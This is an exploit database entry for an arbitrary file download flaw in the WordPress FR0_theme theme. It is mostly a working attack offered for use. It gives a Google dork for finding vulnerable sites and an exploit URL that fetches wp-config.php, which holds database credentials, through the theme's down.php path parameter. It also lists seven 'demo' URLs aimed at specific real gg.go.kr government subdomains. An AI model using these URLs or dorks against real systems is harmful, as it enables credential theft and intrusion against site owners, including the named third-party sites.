WordPress FR0_theme theme Arbitrary File Download Vulnerability

2014-09-01T00:00:00
ID 1337DAY-ID-22571
Type zdt
Reporter alieye
Modified 2014-09-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : WordPress FR0_theme theme Arbitrary File Download Vulnerability
# Author : alieye
# designer Homepage : http://english.gg.go.kr/
# Contact : [email protected]
# Risk : High
# Class: Remote
# Google Dork: inurl:/themes/FR0_theme/
# Date: 01/09/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can download any file from your target ;)


exploit: http://victim.com/wp-content/themes/FR0_theme/down.php?path=http://victim.com/wp-config.php


Demo:

http://greencafe.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://greencafe.gg.go.kr/wp-config.php
http://gvs.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://gvs.gg.go.kr/wp-config.php
http://farm.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://farm.gg.go.kr/wp-config.php
http://fish.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://fish.gg.go.kr/wp-config.php
http://forest.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://forest.gg.go.kr/wp-config.php
http://nongup.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://nongup.gg.go.kr/wp-config.php
http://childfarm.gg.go.kr/wp-content/themes/FR0_theme/down.php?path=http://childfarm.gg.go.kr/wp-config.php

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#  0day.today [2018-04-12]  #